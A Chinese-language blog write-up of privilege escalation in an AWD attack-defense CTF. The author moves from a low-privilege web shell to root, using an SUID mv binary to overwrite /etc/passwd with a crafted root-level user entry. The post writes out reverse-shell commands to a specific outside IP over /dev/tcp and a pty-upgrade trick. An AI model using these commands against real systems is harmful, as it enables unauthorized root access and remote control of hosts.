记一次 AWD 比赛中曲折的 Linux 提权

前提背景：

今天一场 AWD 比赛中，遇到一个场景：PHP网站存在SQL注入和文件上传漏洞, MYSQL当前用户为ROOT，文件上传蚁剑连接SHELL是权限很低的用户。我需要想办法进行提权，才能读取到 /root 目录下的 flag。

---

一、sqlmap --os-shell 提权

看到当前用户是DBA都会想着 --os-shell 提权拿shell, 然后直接读取 /root 里面的 flag。 然而我试了半天，一直无法获取shell, 卡在无法写入文件。查阅资料发现自己一直对数据库的root有误解：

• DBA（Database Administrator）通常是数据库管理员的角色，负责管理数据库的配置、性能优化、安全性等任务。然而，DBA 和操作系统中的 root 用户不是同一个概念，它们有不同的权限和责任。
• 在数据库管理系统中，root 用户是具有最高权限的用户，可以执行所有管理任务，包括创建、删除、修改数据库对象以及用户帐户。但是，root 用户在操作系统层面没有访问操作系统文件系统的权限，包括读取操作系统的 root 目录。
• 使用 sqlmap -os-shell 可能导致获取到与目标系统相关的命令执行权限，但这与操作系统的 root 权限无关。-os-shell 的具体权限取决于目标系统上正在运行的 Web 应用程序的用户权限，而不是数据库的 root 权限。

综上，此法无效。

---

二、内核提权：

目标服务器版本信息：

运行 linux-exploit-suggester.sh 脚本根据当前linux版本查询可利用内核提权程序

下载了好几个截图中内核提权的.c源代码进行编译，然而没一个有用，不想找了，遂放弃。

---

三、SUID 提权：

SUID是赋予文件的一种权限，它会出现在文件拥有者权限的执行位上，具有这种权限的文件会在其执行时，使调用者暂时获得该文件拥有者的权限。也就是如果ROOT用户给某个可执行文件加了S权限，那么该执行程序运行的时候将拥有ROOT权限。

ps：常见的suid提权文件：nmap、vim、find、more、less、bash、cp、Nano、mv、awk、man、weget

使用开源工具 suidcheck.sh 自动分析具有 s 权限的可执行文件:

存在 mv 命令，利用 mv 提权：

(www-data:/var/www/html/uploads) $ cat /etc/passwd > passwd
(www-data:/var/www/html/uploads) $ openssl passwd -1 -salt hack hack123
$1$hack$WTn0dk2QjNeKfl.DHOUue0

构造成： hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root/:/bin/bash 插入 passwd

mv 移动 passwd 覆盖 /etc 下的 passwd:

使用 su hack 进行用户切换，提示：su: must be run from a terminal

查阅资料解决方法：python -c 'import pty; pty.spawn("/bin/bash")' ，但是我输入一直报错，非常难受…

我怀疑是蚁剑的问题，我又换上了我的哥斯拉，依旧是这样。我在想要不试试反弹个shell, 因为蚁剑，哥斯拉都是php落地文件执行命令，不是一个shell。

反弹shell 命令：bash -i >/dev/tcp/43.136.46.254/1333 0>&1

又报错了：/bin/sh: 1: cannot create /dev/tcp/43.136.46.254/1333: Directory nonexistent

难道思路又错了？？我特么就不信了，在 Stackoverflow论坛里找到相关解决方案：

使用shell执行脚本有两种方式，分别是 bash xxx.sh 和 bash -c “cmd string”。根据报错信息可知，目标主机使用的是sh，是bash的精简版本，相当于bash --posix 模式。Posix 标准 shell 不提供此功能，这个特性很奇怪，假装有一个/dev/tcp/目录。
解决办法：以后默认使用bash -c “cmd string” 进行反弹shell。如： bash -c ‘exec bash -i >& /dev/tcp/ip/port <&1’

ps: 成功反弹shell，值得注意的是: 有时候会报错，建议尝试执行1-3遍。

在自己的服务器上执行 python 脚本：python -c 'import pty; pty.spawn("/bin/bash")'

无报错，执行 su hack 切换用户，并输入密码：

提权成功！开始读取 /root 下的 flag:

---